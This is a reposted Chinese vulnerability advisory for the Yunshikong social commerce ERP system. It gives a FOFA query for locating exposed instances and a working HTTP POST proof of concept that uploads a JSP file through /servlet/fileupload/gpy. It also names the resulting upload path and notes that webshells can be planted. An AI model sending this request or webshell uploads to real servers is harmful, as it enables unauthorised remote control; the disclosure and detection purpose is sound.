云时空社会化商业ERP系统任意文件上传漏洞
2023-12-19 19:58:38 Author: 网络安全透视镜(查看原文) 阅读量:17 收藏

云时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以整合线上和线下交易模式,覆盖企业经营管理应用各个方面。有效掌控全流程情况,敏捷捕捉消费者需求,快速响应市场变化,规避经营风险,以市场为导向,优化部署营销资源,协同产销、供应与服务,帮助您的企业构建敏捷的经营管理平台,还能通过互联网、人工智能等创新模式,整合流通企业上下游产业链资源,协助您共享数字服务,提升企业数字化管控效率。

该系统存在任意文件上传漏洞,通过此漏洞,攻击者可上传webshell木马,远程控制服务器。

fofa查询

app="云时空社会化商业ERP系统"

POC

POST /servlet/fileupload/gpy HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388Content-Length: 238
--4eea98d02AEa93f60ea08dE3C18A1388Content-Disposition: form-data; name="file1"; filename="check.jsp"Content-Type: application/octet-stream
<% out.println("This website has a vulnerability"); %>--4eea98d02AEa93f60ea08dE3C18A1388--

文件上传成功后路径为:/uploads/pics/上传日期/check.jsp

四、漏洞检测

=

pocsuite3漏洞检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498757&idx=1&sn=31b9f476d419b111ebff50c2088d8cae&chksm=9600de9132b36e1c11acc3e6fce26916e5fee29057c68c30d6a395641cca1b7fc7adf3b12e69&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh